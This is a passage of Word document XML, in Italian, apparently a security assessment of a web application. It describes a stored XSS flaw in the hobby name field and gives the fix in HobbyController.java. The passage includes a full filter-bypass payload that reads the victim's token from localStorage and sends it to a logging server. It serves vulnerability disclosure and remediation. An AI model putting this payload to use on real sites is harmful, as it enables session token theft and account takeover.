      </w:pPr>
      <w:r>
        <w:t>Bisogna essere autenticati come utenti business e poi creare l’hobby nel quale inserire il seguente payload al posto del nome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6BB4E" w14:textId="77777777" w:rsidR="00726EFA" w:rsidRDefault="00726EFA" w:rsidP="00726EFA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A637D83" w14:textId="530EC296" w:rsidR="00FF363E" w:rsidRDefault="00072AFB" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00072AFB">
        <w:t>&lt;s-cript&gt;&lt;img title="&lt;/script&gt;&lt;img src onerror=" var token = localStorage.getItem('token'); var img = new Image(); img.src = 'http://localhost:3000/log?token=' + encodeURIComponent(token); "&gt;"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF26FD" w14:textId="18046FE2" w:rsidR="00825307" w:rsidRDefault="00726EFA" w:rsidP="00726EFA">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Questo farà in modo di recuperare il token dell’utente che avrà accesso all’hobby e di inviarlo allo stesso server usato precedentemente per l’attacco XSS che riceverà e stamperà il token della vittima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AA6C15" w14:textId="2FCFE17F" w:rsidR="00726EFA" w:rsidRDefault="00A86CD2" w:rsidP="00726EFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252004352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6759EC68" wp14:editId="59D912B7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6838950" cy="4114490"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="289545475"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8950" cy="4114490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C568D8A" w14:textId="286B0CE9" w:rsidR="00825307" w:rsidRPr="006A185C" w:rsidRDefault="00825307" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E49AC" w14:textId="72131EB7" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2490A340" w14:textId="0271F408" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5FC7E457" w14:textId="6FB4AE0A" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F8B95EE" w14:textId="2975FBE6"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237524E5" w14:textId="550A9EE6" w:rsidR="00726EFA" w:rsidRDefault="00A86CD2" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251912192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="010A88AF" wp14:editId="137ECEA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>618490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6108065" cy="635"/>
                <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1154506553" name="Casella di testo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E91DD00" w14:textId="193D9B87"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>8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88AF" id="_x0000_s1107" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:48.7pt;width:480.95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3Gg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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7E91DD00" w14:textId="193D9B87"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>80</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F138534" w14:textId="06A28280" w:rsidR="00C74003" w:rsidRDefault="003E3234" w:rsidP="00467BBC">
      <w:r w:rsidRPr="00C74003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68F4C9" w14:textId="3642C509" w:rsidR="005F7CDE" w:rsidRDefault="00726EFA" w:rsidP="00467BBC">
      <w:r>
        <w:t>Per risolvere il bug b</w:t>
      </w:r>
      <w:r w:rsidR="00617F11">
        <w:t>isogna fare il replace del n</w:t>
      </w:r>
      <w:r>
        <w:t>ome</w:t>
      </w:r>
      <w:r w:rsidR="00617F11">
        <w:t xml:space="preserve"> prima di validare la stringa col pattern.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>81</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> è mostrata la versione corretta della validazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B2F2F" w14:textId="63FCCA88" w:rsidR="005F7CDE" w:rsidRDefault="00A86CD2" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252005376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79238B45" wp14:editId="73F2A961">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>94615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276262" cy="4084320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1394977843"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6262" cy="4084320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00726EFA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251914240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="282E0620" wp14:editId="35BD2784">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>173990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4262120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5764530" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1624154093" name="Casella di testo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14D7280" w14:textId="02919AD1"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>81</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620" id="_x0000_s1108" type="#_x0000_t202" style="position:absolute;margin-left:13.7pt;margin-top:335.6pt;width:453.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AH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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="314D7280" w14:textId="02919AD1"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>81</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28381E" w14:textId="7C0187A0" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5C915BE3" w14:textId="7ECE271B" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="57566D7C" w14:textId="28F52AEC" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5545157F" w14:textId="3E574239" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51C2ED48" w14:textId="5089C65B"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97115"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="293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2"/>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 w:numId="13" w16cid:durableId="1345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15CE5"/>
    <w:rsid w:val="0006778F"/>
    <w:rsid w:val="00071E32"/>
    <w:rsid w:val="00072AFB"/>
    <w:rsid w:val="00073656"/>
    <w:rsid w:val="00081BA5"/>
    <w:rsid w:val="00093E39"/>
    <w:rsid w:val="00094023"/>
    <w:rsid w:val="000B2D9C"/>
    <w:rsid w:val="000C60C5"/>
    <w:rsid w:val="000C7E72"/>
    <w:rsid w:val="000E1CCE"/>
    <w:rsid w:val="000F2421"/>
    <w:rsid w:val="000F4F60"/>
    <w:rsid w:val="00124628"/>
    <w:rsid w:val="00140DA2"/>
    <w:rsid w:val="00171715"/>
    <w:rsid w:val="00185FB3"/>
    <w:rsid w:val="001935CC"/>
    <w:rsid w:val="00197C79"/>
    <w:rsid w:val="001A56AB"/>
    <w:rsid w:val="001A57CF"/>
    <w:rsid w:val="001B4E1A"/>
    <w:rsid w:val="001C7EE3"/>
    <w:rsid w:val="001D2095"/>
    <w:rsid w:val="00241973"/>
    <w:rsid w:val="00242251"/>
    <w:rsid w:val="00245DF3"/>
    <w:rsid w:val="00250F61"/>
    <w:rsid w:val="0026401D"/>
    <w:rsid w:val="002666AE"/>
    <w:rsid w:val="002675ED"/>
    <w:rsid w:val="00270956"/>
    <w:rsid w:val="00273E57"/>
    <w:rsid w:val="00281830"/>
    <w:rsid w:val="002912F7"/>
    <w:rsid w:val="00296FF5"/>
    <w:rsid w:val="002A0868"/>
    <w:rsid w:val="002C11A4"/>
    <w:rsid w:val="002D1426"/>
    <w:rsid w:val="002F1920"/>
    <w:rsid w:val="002F292A"/>
    <w:rsid w:val="003022AA"/>
    <w:rsid w:val="0031586D"/>
    <w:rsid w:val="00335218"/>
    <w:rsid w:val="00341F3A"/>
    <w:rsid w:val="00350230"/>
    <w:rsid w:val="00350E38"/>
    <w:rsid w:val="003620AB"/>
    <w:rsid w:val="00370316"/>
    <w:rsid w:val="00370730"/>
    <w:rsid w:val="003836B9"/>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C5F9A"/>
    <w:rsid w:val="004D43F9"/>
    <w:rsid w:val="004E2F86"/>
    <w:rsid w:val="004E3997"/>
    <w:rsid w:val="004E4997"/>
    <w:rsid w:val="00510D75"/>
    <w:rsid w:val="00524F81"/>
    <w:rsid w:val="005333DB"/>
    <w:rsid w:val="0053542A"/>
    <w:rsid w:val="005422F3"/>
    <w:rsid w:val="00553627"/>
    <w:rsid w:val="00573261"/>
    <w:rsid w:val="00576284"/>
    <w:rsid w:val="005A6F04"/>
    <w:rsid w:val="005B284B"/>
    <w:rsid w:val="005B48C7"/>
    <w:rsid w:val="005D6BD8"/>
    <w:rsid w:val="005D725F"/>
    <w:rsid w:val="005E267F"/>
    <w:rsid w:val="005E4094"/>
    <w:rsid w:val="005E4254"/>
    <w:rsid w:val="005E7293"/>
    <w:rsid w:val="005F3B18"/>
    <w:rsid w:val="005F7CDE"/>
    <w:rsid w:val="0060328E"/>
    <w:rsid w:val="00617F11"/>
    <w:rsid w:val="00631C73"/>
    <w:rsid w:val="00631FB1"/>
    <w:rsid w:val="00655E59"/>
    <w:rsid w:val="00674FEC"/>
    <w:rsid w:val="00681873"/>
    <w:rsid w:val="006A185C"/>
    <w:rsid w:val="006A2C81"/>
    <w:rsid w:val="006B3EEC"/>
    <w:rsid w:val="006C2D8D"/>
    <w:rsid w:val="006D5B67"/>
    <w:rsid w:val="006F4082"/>
    <w:rsid w:val="007019BC"/>
    <w:rsid w:val="007134C2"/>
    <w:rsid w:val="007239A2"/>
    <w:rsid w:val="00726EFA"/>
    <w:rsid w:val="007424E1"/>
    <w:rsid w:val="00743C4B"/>
    <w:rsid w:val="00747D31"/>
    <w:rsid w:val="0076032B"/>
    <w:rsid w:val="0077061B"/>
    <w:rsid w:val="00777E6A"/>
    <w:rsid w:val="00791AF1"/>
    <w:rsid w:val="00792C82"/>
    <w:rsid w:val="00793624"/>
    <w:rsid w:val="007941E4"/>
    <w:rsid w:val="007A3300"/>
    <w:rsid w:val="007A6099"/>
    <w:rsid w:val="007B1CF1"/>
    <w:rsid w:val="007C5F43"/>
    <w:rsid w:val="007C686E"/>
    <w:rsid w:val="007D3F5D"/>
    <w:rsid w:val="007F2270"/>
    <w:rsid w:val="00813584"/>
    <w:rsid w:val="00816871"/>
    <w:rsid w:val="00825307"/>
    <w:rsid w:val="008302E7"/>
    <w:rsid w:val="00844BCD"/>
    <w:rsid w:val="00845CA0"/>
    <w:rsid w:val="00850623"/>
    <w:rsid w:val="00851F35"/>
    <w:rsid w:val="008568AE"/>
    <w:rsid w:val="00861705"/>
    <w:rsid w:val="00870E32"/>
    <w:rsid w:val="00872EF7"/>
    <w:rsid w:val="0088250F"/>
    <w:rsid w:val="008B0B12"/>
    <w:rsid w:val="008B6F6D"/>
    <w:rsid w:val="009015E9"/>
    <w:rsid w:val="009036AA"/>
    <w:rsid w:val="0091567C"/>
    <w:rsid w:val="00922898"/>
    <w:rsid w:val="00926F16"/>
    <w:rsid w:val="0096086E"/>
    <w:rsid w:val="009769CB"/>
    <w:rsid w:val="00987816"/>
    <w:rsid w:val="0098788D"/>
    <w:rsid w:val="00992E84"/>
    <w:rsid w:val="009A1CD7"/>
    <w:rsid w:val="009B3431"/>
    <w:rsid w:val="009C266A"/>
    <w:rsid w:val="009D152E"/>
    <w:rsid w:val="00A15CC1"/>
    <w:rsid w:val="00A2084F"/>
    <w:rsid w:val="00A257E3"/>
    <w:rsid w:val="00A31A32"/>
    <w:rsid w:val="00A54E4E"/>
    <w:rsid w:val="00A62E0F"/>
    <w:rsid w:val="00A74318"/>
    <w:rsid w:val="00A83B5D"/>
    <w:rsid w:val="00A86CD2"/>
    <w:rsid w:val="00AA4F9B"/>
    <w:rsid w:val="00AB3362"/>
    <w:rsid w:val="00AC599E"/>
    <w:rsid w:val="00AD3339"/>
    <w:rsid w:val="00AF5966"/>
    <w:rsid w:val="00AF6513"/>
    <w:rsid w:val="00B019CE"/>
    <w:rsid w:val="00B04DA2"/>
    <w:rsid w:val="00B11AA2"/>
    <w:rsid w:val="00B508DA"/>
    <w:rsid w:val="00B63358"/>
    <w:rsid w:val="00B707B2"/>
    <w:rsid w:val="00BA0541"/>
    <w:rsid w:val="00BB112C"/>
    <w:rsid w:val="00BC247B"/>
    <w:rsid w:val="00BD03FB"/>
    <w:rsid w:val="00BE15A3"/>
    <w:rsid w:val="00BF4ABA"/>
    <w:rsid w:val="00C079D4"/>
    <w:rsid w:val="00C262C3"/>
    <w:rsid w:val="00C30321"/>
    <w:rsid w:val="00C36FFB"/>
    <w:rsid w:val="00C46E60"/>
    <w:rsid w:val="00C50370"/>
    <w:rsid w:val="00C53044"/>
    <w:rsid w:val="00C53E14"/>
    <w:rsid w:val="00C56823"/>
    <w:rsid w:val="00C64892"/>
    <w:rsid w:val="00C74003"/>
    <w:rsid w:val="00C82F57"/>
    <w:rsid w:val="00C87C03"/>
    <w:rsid w:val="00CA09AC"/>
    <w:rsid w:val="00CC03BC"/>
    <w:rsid w:val="00CC23BE"/>
    <w:rsid w:val="00CD7B9B"/>
    <w:rsid w:val="00CE1B39"/>
    <w:rsid w:val="00CE3AE0"/>
    <w:rsid w:val="00CE3F28"/>
    <w:rsid w:val="00D03FA6"/>
    <w:rsid w:val="00D12C9A"/>
    <w:rsid w:val="00D22103"/>
    <w:rsid w:val="00D72C3C"/>
    <w:rsid w:val="00D83D81"/>
    <w:rsid w:val="00D930D6"/>
    <w:rsid w:val="00D95D77"/>
    <w:rsid w:val="00D97650"/>
    <w:rsid w:val="00DA7D75"/>
    <w:rsid w:val="00DE1106"/>
    <w:rsid w:val="00DE4795"/>
    <w:rsid w:val="00DE7E9C"/>
    <w:rsid w:val="00E12B17"/>
    <w:rsid w:val="00E16865"/>
    <w:rsid w:val="00E24530"/>
    <w:rsid w:val="00E36F9F"/>
    <w:rsid w:val="00E464AA"/>
    <w:rsid w:val="00E811FF"/>
    <w:rsid w:val="00EB78A7"/>
    <w:rsid w:val="00ED7083"/>
    <w:rsid w:val="00EF10FE"/>
    <w:rsid w:val="00F04F57"/>
    <w:rsid w:val="00F13DB4"/>
    <w:rsid w:val="00F35257"/>
    <w:rsid w:val="00F36B9B"/>
    <w:rsid w:val="00F52417"/>
    <w:rsid w:val="00F5273B"/>
    <w:rsid w:val="00F56083"/>
    <w:rsid w:val="00FA683C"/>
    <w:rsid w:val="00FC6340"/>
    <w:rsid w:val="00FC6F6C"/>
    <w:rsid w:val="00FD3A3A"/>
    <w:rsid w:val="00FD7204"/>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9A2"/>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1367">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="586118354">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1454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85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74">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1570384538">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="201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60">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="939947871">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="174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799">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="940916059">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1844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2198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="22903104">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="632447984">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2028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712">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1870559435">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2117171725">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1734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6346">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="50371445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sChild>
                <w:div w:id="119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048">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1623153960">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1156801722">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="178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tes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4897</Words>
  <Characters>2791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55</cp:revision>
  <cp:lastPrinted>2024-06-28T13:09:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-10T15:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-28T13:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>